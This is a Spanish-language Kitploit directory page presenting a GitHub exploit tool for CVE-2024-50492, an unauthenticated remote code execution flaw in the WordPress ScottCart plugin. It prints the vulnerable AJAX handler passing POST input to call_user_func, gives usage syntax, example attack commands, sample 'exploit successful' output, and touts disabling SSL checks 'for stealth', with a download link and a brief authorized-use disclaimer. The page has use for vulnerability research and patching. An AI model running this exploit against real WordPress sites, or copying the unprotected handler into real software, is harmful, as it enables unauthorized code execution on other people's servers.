Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50492 — ScottCart <= 1.1 - Ejecución Remota de Código no Autenticada | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2024-50492
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - Ejecución Remota de Código no Autenticada

Ver Repositorio
1hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🚨 CVE-2024-50492 - Exploit RCE para ScottCart <= 1.1

🔥 Script de Exploit para ScottCart <= 1.1 - Ejecución Remota de Código sin autenticación
🧑‍💻 Por Nxploit – Khaled Alenazi


📌 Descripción

El plugin ScottCart para WordPress (versiones ≤ 1.1) es vulnerable a Ejecución Remota de Código (RCE).
Esto permite a atacantes no autenticados ejecutar funciones PHP arbitrarias en el servidor a través de un punto final AJAX vulnerable.

  • Plugin: ScottCart ≤ 1.1
  • Vulnerabilidad: Inyección de funciones sin autenticación → RCE
  • CVE: CVE-2024-50492
  • Puntuación CVSS: 9.8 - Crítica

🧠 Cómo funciona

El plugin registra una acción AJAX desprotegida:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

Que ejecuta:

root@kitploit:~
call_user_func($_POST['function']);

Permitiendo a los atacantes llamar cualquier función PHP existente, como:

  • phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← si se extiende en entornos modificados

🚀 Características del Exploit

  • ✅ Envía automáticamente un payload diseñado para desencadenar el punto final vulnerable
  • ✅ Permite sobrescribir la función mediante un argumento
  • ✅ Payload por defecto: phpinfo() para PoC
  • ✅ Guarda la salida en un archivo con marca de tiempo (ej., results_2025-03-26_14-33-01.txt)
  • ✅ User-Agent personalizado, manejo de errores e ignorar SSL para sigilo

🖥️ Uso

root@kitploit:~
usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]

ScottCart <= 1.1 - Unauthenticated Remote Code Execution
By Nxploit Khaled Alenazi.

options:
  -h, --help            Show this help message and exit
  -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
  -p PAYLOAD, --payload PAYLOAD
                        Function to call (default: phpinfo)

💡 Ejemplos

🔍 Comportamiento por defecto (PoC con phpinfo()):

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress

🔎 Llamar a una función interna del plugin:

root@kitploit:~
python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip

🧾 Ejemplo de salida

root@kitploit:~
[+] Target URL: http://192.168.100.74:888/wordpress
[+] Payload Function: phpinfo
[*] Launching exploit...
[+] Sending payload: function=phpinfo
[+] Exploit successful! Output:

PHP Version => 8.1.12
...

📁 Y guardado en: results_2025-03-26_14-33-01.txt


🛡️ Descargo de responsabilidad

Esta herramienta es solo para fines educativos y de pruebas autorizadas.
No la utilice contra sistemas que no posea o para los que no tenga permiso explícito para probar.


💬 Créditos

  • 💻 Exploit por: Nxploit – Khaled Alenazi
  • 🛡️ ID de CVE: CVE-2024-50492
Descargar herramienta